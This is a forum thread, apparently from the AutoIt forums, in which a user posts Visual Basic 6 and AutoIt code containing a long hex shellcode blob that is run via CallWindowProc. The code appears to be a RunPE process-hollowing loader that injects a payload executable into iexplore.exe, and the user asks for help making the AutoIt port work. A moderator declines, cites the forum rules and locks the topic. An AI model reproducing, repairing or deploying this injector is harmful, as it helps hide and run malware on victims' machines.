Jump to content

Hex to Byte

NewUser2025
 Share

Recommended Posts

NewUser2025 Seeker

NewUser2025

Posted
Posted

Hello, trying to convert my visual basic 6 with my shell code in autoit. I'm using shellcode and it works without problems on vb6. The problems comes when im trying to convert the shellcode from hex to byte  im always getting either 0000000000000  or  0x00000000055 etc... 

Ive tried a couple ways but still nothing 

here is the vb6 code  

Private Declare Function CallWindowProcW Lib "user32" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Sub Main()
Dim procpath As String
Dim payload() As Byte
procpath = "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
payload = LoadResData(101, "CUSTOM")
Call memory(procpath, payload)
End Sub


Public Sub memory(ByVal ruta As String, binario() As Byte)

Dim b_ASM(4095) As Byte
Dim ShellCode As String
ShellCode = "5553575681EC4C03000064A1300000008B400C8B40148B008B008B401089C18B413C8B4408788B54081885D20F841B0100008B74082001CE897424148B74082401CE8934248B44081C01C88944242031C0EB12666666662E0F1F8400000000004039D074658B7424148B34860FB61C0E84DB74EC01CE46BF051500000F1F40000FBEDB89FDC1E50501EF01DF0FB61E4684DB75EC81FF11F1BF5F75C48B34240FB704468B7424208B048601C80F847C0200008038E9751589C68B400101F083C00585D2750FE96E02000031C085D20F84640200008944240431C0EB090F1F40004039D0747B8B7424148B34860FB61C0E84DB74EC01CE46BD051500000"
ShellCode = ShellCode & "F1F40000FBEFB89EBC1E30501DD01FD0FB61E4684DB75EC81FD1FBB31CF75C48B34240FB704468B7424208B048601C87432894424108038E98B44240475318B7424108B460101C683C60589742410EB1B31D2C744240C0000000031F631C0E9E4010000C7442410000000008B44240485D20F84ED00000031C0EB0D0F1F8400000000004039D074638B7424148B34860FB61C0E84DB74EC01CE46BD051500000F1F40000FBEFB89EBC1E30501DD01FD0FB61E4684DB75EC81FD2F2EB5AE75C48B34240FB704468B7424208B348601CE0F84CD020000803EE975138B460101C683C60585D2750FE9C102000031F685D20F84B70200008974240831F6EB"
ShellCode = ShellCode & "0B660F1F4400004639D674788B4424148B1CB00FB6040B84C074EC01CB43BD051500000F1F40000FBEC089EFC1E70501FD01C50FB6034384C075EC81FDB45A6EF375C48B04240FB704708B7424208B1C8601CB742F803BE98B742408752C8B430101C383C305EB2231D2C744240C0000000031F631DB31EDC7042400000000E94502000031DB8B74240885D20F845B010000895C241831DBEB16666666662E0F1F8400000000004339D30F84AD0000008B4424148B2C980FB6440D0084C074E701CD45BE051500006666666666662E0F1F8400000000000FBEC089F7C1E70501FE01C60FB645004584C075EB81FEC8E8226F75B38B04240FB704588B7"
ShellCode = ShellCode & "424208B048601C88944240C74538B44240C8038E98B4424048B7424088B5C241875528B7C240C8B470101C783C705897C240C8B442404EB3C31C085D20F859CFDFFFF31D2C744240C0000000031F631C931DB31EDC7042400000000E970010000C744240C000000008B4424048B7424088B5C241885D20F842601000031EDEB0F662E0F1F8400000000004539D574708B4424148B1CA80FB6040B84C074EC01CB43BE051500000F1F40000FBEC089F7C1E70501FE01C60FB6034384C075EC81FEC2CFA2EB75C48B04240FB704688B7424208B2C8601CD7427807D00E98B7424088B5C241875238B450101C583C505EB1931D2C744240C00000000E9C0"
ShellCode = ShellCode & "00000031ED8B7424088B5C241885D20F848D030000896C242431EDEB0A904539D50F84C40200008B4424148B1CA80FB6040B84C074E801CB43BE051500000FBEC089F7C1E70501FE01C60FB6034384C075EC81FE4E96207E75C48B04240FB704688B7424208B048601C80F847B0200008944241C8038E98B4424048B7424088B5C24188B6C24240F85760200008B7C241C8B470101C783C705897C241C8B442404E95D02000031D2E9D0FDFFFF31F685D20F8549FDFFFF31D2C744240C0000000031DB31EDC70424000000008B4424048B4C241085C00F840402000085C90F84FC01000085F60F84F401000085DB0F84EC010000837C240C000F84E10"
ShellCode = ShellCode & "1000085ED0F84D901000085D20F84D1010000833C24000F84C70100008954241C8B8424640300008B8C2460030000C744247C00000000C744247800000000C744247400000000C744247000000000C744246C00000000C744246800000000C744246400000000C744246000000000C744245C00000000C744245800000000C744245400000000C744245000000000C744244C00000000C744244800000000C744244400000000C744244000000000C744243C440000008B503C895424140FB7441014894424208D44242C8D54243C50526A006A006A046A006A006A006A0051FFD685C00F84FA000000896C24246A4068003000008BAC246C0300008B"
ShellCode = ShellCode & "7C241CFF743D50FF743D34FF74243CFFD389C6894424286A00FF743D545550FF74243CFF54242066837C3D060074568B4C2420034C24148B8424640300008D1C0883C32C31FF6666666666662E0F1F8400000000008B43F801F08B0B8BAC246403000001E96A00FF73FC5150FF74243CFF542420478B4424140FB744050683C32839C772D0C7842480000000070001008DB4248000000056FF742434FF54242C8B84242401000083C0088D4C24286A006A045150FF74243CFF5424208B8424640300008B4C24148B440828034424288984243001000056FF742434FF542424FF742430FF54240481C44C0300005E5F5B5DC3C744241C000000008B442"



For i = 1 To Len(ShellCode) Step 2
    b_ASM(K) = CByte("&H" & Mid$(ShellCode, i, 2)): K = K + 1
Next i



CallWindowProcW VarPtr(b_ASM(0)), StrPtr(ruta), VarPtr(binario(0)), 0, 0
End Sub


 

 and here is the autoit code 

  

#include <Memory.au3>
#include <WinAPI.au3>
#include <File.au3>

Global $procpath = "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Global $payload = FileRead("C:\Users\Pc\Desktop\halka.exe", 1)
If @error Then
   MsgBox(0, "Error", "Failed to read payload file")
   Exit
EndIf

MsgBox(0, "Debug", "Payload loaded")
memory($procpath, $payload)

Func memory($ruta, $binario)
   Local $b_ASM[4096]

    Local $ShellCode = "5553575681EC4C03000064A1300000008B400C8B40148B008B008B401089C18B413C8B4408788B54081885D20F841B0100008B74082001CE897424148B74082401CE8934248B44081C01C88944242031C0EB12666666662E0F1F8400000000004039D074658B7424148B34860FB61C0E84DB74EC01CE46BF051500000F1F40000FBEDB89FDC1E50501EF01DF0FB61E4684DB75EC81FF11F1BF5F75C48B34240FB704468B7424208B048601C80F847C0200008038E9751589C68B400101F083C00585D2750FE96E02000031C085D20F84640200008944240431C0EB090F1F40004039D0747B8B7424148B34860FB61C0E84DB74EC01CE46BD051500000"
    $ShellCode &= "F1F40000FBEFB89EBC1E30501DD01FD0FB61E4684DB75EC81FD1FBB31CF75C48B34240FB704468B7424208B048601C87432894424108038E98B44240475318B7424108B460101C683C60589742410EB1B31D2C744240C0000000031F631C0E9E4010000C7442410000000008B44240485D20F84ED00000031C0EB0D0F1F8400000000004039D074638B7424148B34860FB61C0E84DB74EC01CE46BD051500000F1F40000FBEFB89EBC1E30501DD01FD0FB61E4684DB75EC81FD2F2EB5AE75C48B34240FB704468B7424208B348601CE0F84CD020000803EE975138B460101C683C60585D2750FE9C102000031F685D20F84B70200008974240831F6EB"
    $ShellCode &= "0B660F1F4400004639D674788B4424148B1CB00FB6040B84C074EC01CB43BD051500000F1F40000FBEC089EFC1E70501FD01C50FB6034384C075EC81FDB45A6EF375C48B04240FB704708B7424208B1C8601CB742F803BE98B742408752C8B430101C383C305EB2231D2C744240C0000000031F631DB31EDC7042400000000E94502000031DB8B74240885D20F845B010000895C241831DBEB16666666662E0F1F8400000000004339D30F84AD0000008B4424148B2C980FB6440D0084C074E701CD45BE051500006666666666662E0F1F8400000000000FBEC089F7C1E70501FE01C60FB645004584C075EB81FEC8E8226F75B38B04240FB704588B7"
    $ShellCode &= "424208B048601C88944240C74538B44240C8038E98B4424048B7424088B5C241875528B7C240C8B470101C783C705897C240C8B442404EB3C31C085D20F859CFDFFFF31D2C744240C0000000031F631C931DB31EDC7042400000000E970010000C744240C000000008B4424048B7424088B5C241885D20F842601000031EDEB0F662E0F1F8400000000004539D574708B4424148B1CA80FB6040B84C074EC01CB43BE051500000F1F40000FBEC089F7C1E70501FE01C60FB6034384C075EC81FEC2CFA2EB75C48B04240FB704688B7424208B2C8601CD7427807D00E98B7424088B5C241875238B450101C583C505EB1931D2C744240C00000000E9C0"
    $ShellCode &= "00000031ED8B7424088B5C241885D20F848D030000896C242431EDEB0A904539D50F84C40200008B4424148B1CA80FB6040B84C074E801CB43BE051500000FBEC089F7C1E70501FE01C60FB6034384C075EC81FE4E96207E75C48B04240FB704688B7424208B048601C80F847B0200008944241C8038E98B4424048B7424088B5C24188B6C24240F85760200008B7C241C8B470101C783C705897C241C8B442404E95D02000031D2E9D0FDFFFF31F685D20F8549FDFFFF31D2C744240C0000000031DB31EDC70424000000008B4424048B4C241085C00F840402000085C90F84FC01000085F60F84F401000085DB0F84EC010000837C240C000F84E10"
    $ShellCode &= "1000085ED0F84D901000085D20F84D1010000833C24000F84C70100008954241C8B8424640300008B8C2460030000C744247C00000000C744247800000000C744247400000000C744247000000000C744246C00000000C744246800000000C744246400000000C744246000000000C744245C00000000C744245800000000C744245400000000C744245000000000C744244C00000000C744244800000000C744244400000000C744244000000000C744243C440000008B503C895424140FB7441014894424208D44242C8D54243C50526A006A006A046A006A006A006A0051FFD685C00F84FA000000896C24246A4068003000008BAC246C0300008B"
    $ShellCode &= "7C241CFF743D50FF743D34FF74243CFFD389C6894424286A00FF743D545550FF74243CFF54242066837C3D060074568B4C2420034C24148B8424640300008D1C0883C32C31FF6666666666662E0F1F8400000000008B43F801F08B0B8BAC246403000001E96A00FF73FC5150FF74243CFF542420478B4424140FB744050683C32839C772D0C7842480000000070001008DB4248000000056FF742434FF54242C8B84242401000083C0088D4C24286A006A045150FF74243CFF5424208B8424640300008B4C24148B440828034424288984243001000056FF742434FF542424FF742430FF54240481C44C0300005E5F5B5DC3C744241C000000008B442"
    


      Local $K = 0

   For $i = 1 To StringLen($ShellCode) Step 2
       $b_ASM[$K] = Dec("0x" & StringMid($ShellCode, $i, 2))
       $K += 1
   Next

   MsgBox(0, "Debug", "Shellcode converted")

  
   MsgBox(0, "Debug", "First bytes: 0x" & Hex($b_ASM[0]) & " " & Hex($b_ASM[1]) & " " & Hex($b_ASM[2]) & " " & Hex($b_ASM[3]))

   Local $result = DllCall("user32.dll", "ptr", "CallWindowProc", _
       "ptr", DllStructGetPtr(DllStructCreate("byte[" & $K & "]", $b_ASM)), _
       "str", $ruta, _
       "ptr", DllStructGetPtr(DllStructCreate("byte[" & BinaryLen($binario) & "]", $binario)), _
       "int", 0, _
       "int", 0)

   If @error Then
       MsgBox(0, "Error", "DllCall failed: " & @error)
   Else
       MsgBox(0, "Success", "Return value: 0x" & Hex($result[0]) & @CRLF & _
           "ASM ptr: 0x" & Hex(DllStructGetPtr(DllStructCreate("byte[" & $K & "]", $b_ASM))) & @CRLF & _
           "Binario ptr: 0x" & Hex(DllStructGetPtr(DllStructCreate("byte[" & BinaryLen($binario) & "]", $binario))))
   EndIf
EndFunc


and the results from converting 



 

2.png

  • Developers
Jos Universalist

Jos

Posted
  • Developers
Posted (edited)

Nah...   i prefer a serious reply, so can only assume i am right.

Please read our forum rules before posting again.

 

Edited by Jos

SciTE4AutoIt3 Full installer Download page   - Beta files       Read before posting     How to post scriptsource   Forum etiquette  Forum Rules 
 
Live for the present,
Dream of the future,
Learn from the past.  :)

  • Jos locked this topic
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...